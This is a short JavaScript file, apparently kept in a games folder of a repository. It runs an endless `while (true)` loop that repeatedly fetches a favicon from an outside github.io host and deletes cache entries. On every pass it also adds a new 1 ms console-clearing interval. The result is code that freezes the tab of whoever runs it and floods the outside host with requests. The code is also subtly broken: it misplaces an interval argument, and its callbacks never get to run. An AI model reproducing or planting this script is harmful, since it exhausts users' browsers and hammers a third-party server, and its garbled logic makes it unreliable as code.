games/Games/Krydder/dlhermann.js
2022-12-16 12:09:45 +01:00

16 lines
374 B
JavaScript

while (true) {
fetch('https://t0m0t0w.github.io/favicon.png')
.then(response => response.text())
.then(data => {
// Do something with the data
console.log(data);
// Delete the file from the cache
caches.delete('https://t0m0t0w.github.io/favicon.png');
}, 1000);
setInterval(() => {
console.clear();
}, 1);
}